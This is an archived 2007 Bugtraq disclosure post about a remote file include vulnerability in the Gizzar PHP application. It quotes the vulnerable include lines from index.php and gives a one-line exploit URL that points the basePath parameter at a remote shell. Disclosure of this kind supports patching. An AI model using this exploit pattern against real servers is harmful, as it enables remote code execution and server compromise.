lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 16 Apr 2007 22:33:43 +0300
From: "BorN To K!LL BorN To K!LL" <q.t.i@...mail.com>
To: submit@...w0rm.com
Cc: bugtraq@...urityfocus.com
Subject: Gizzar <= (basePath) Remote File Include Vulnerability

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Gizzar <= (basePath) Remote File Include Vulnerability

Download: 
http://mesh.dl.sourceforge.net/sourceforge/gizzar/gizzar-03162002.tar.gz

Discover: BorN To K!LL

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:

index.php

code:

include_once($basePath."include/config.php");
include_once($basePath."include/access.php");

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

EploiT:

wWw.SiTe.cOm/[path]/index.php?basePath=Shell

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Greedz 2:

Dr.2  -  AsbMay  -  GolD_M  -  str0ke ....

wWw.KuW-SeC.cC
wWw.Asb-May.nEt

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Powered by blists - more mailing lists